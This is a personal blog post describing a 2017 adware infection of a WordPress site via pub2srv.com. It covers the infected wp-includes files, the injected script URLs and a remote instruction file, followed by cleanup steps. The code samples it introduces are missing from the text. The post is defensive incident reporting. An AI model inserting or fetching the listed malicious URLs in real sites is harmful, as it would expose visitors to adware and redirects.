What To Do If Your WordPress Site Is Infected By pub2srv.com Adware

This site was infected by adware between end of August 2017 and 26 October 2017.

What happened

I realized something was wrong when I visited my own site this morning and discovered that there were popup and redirection when I clicked on anywhere on the page.

The Evil Adware

The Evil Adware

Also, when I checked the analytics of the site, there were practically no visitors since the beginning of September 2017.

Zero Visitor Since September 2017

Practically Zero Visitor Since September 2017

Investigation

I run a test using pingdom tool (you can see the scan result by clicking the link) and confirmed that my WordPress site was being infected by adware.

Here are the findings:

pub2srv.com

pub2srv.com

mobisla.com

mobisla.com

deloton.com

deloton.com

Some unknown scripts were being injected into the site.

  • http://deloton.com/apu.php?zoneid=1063894
  • go.pub2srv.com
  • http://go.pushnative.com/notice.php?p=628268&interactive=1&pushup=1
  • go.mobisla.com

Root cause analysis

When I tried to scan my WordPress installation folders on the server for files that contain “pub2srv.com” keyword I found nothing.

The hacker is good at playing hide-and-seek.

With help from Google, it turned out that the malicious code was hidden in multiple files located in the <WordPress installation path>/wp-includes/ folder.

Here is the list of the infected files:

  • wp-feed.php: contains a list of IP addresses
  • wp-vcd.php: contains a compressed malicious installation program
  • class.wp.php: contains SQL injections and cross-site scripting
  • post.php: contains the reference to wp-vcd.php

Here is the sample content of class.wp.php:

The above code is adding/injecting user to the database.

It is also loading content from http://www.aotson.com/codexc.txt which contains the following instructions:

The hacker is able to target specific infected site by changing the path remotely via http://www.aotson.com/codexc.txt Pretty clever and super evil.

It is capable of spreading itself to all the WordPress sites across different domain names that are hosted under my user account.

More detail can be found here: wp-vcd.php malware analysis.

Lesson learnt

It is clear that the root cause was due to me installing untrusted WordPress themes on my site.

The infection occurred at an earlier date than mid-August based on the evidence from the backup that I have.

However, the symptom of unusual slowness and trouble only appeared towards the end of August.

Solution

Here is an article on how to remove pub2srv malware to learn more about the adware/malware.

Here is the detail of other people who were also facing the same issue.

I installed the Anti-Malware Security and Brute-Force Firewall plugin and run a scan. 254 files, which were affected, were removed after the scan.

I updated the my WordPress theme to the latest version.

I reinstalled the WordPress version 4.8.2.

I also updated the login password.

I also updated the server user login password just in case.

Final thought

Maintaining a website is similar to maintaining my health. I need to monitor it regularly to avoid temporary death from happening again.

The site is as good as dead for the past two months.

I realized that cyber risk is a real threat that could impact a lot of people. Infected site is capable of spreading virus to innocent visitors and might cause serious damage to them.

It is important to keep the information systems secured so that I will never encounter similar incident again. Here is a self-study guide CISSP (ISC)2 Certified Information Systems Security Professional Official Study Guide that contains information on how to maintain security in a world that is surround with cyber risks. Grab a copy if you are interested.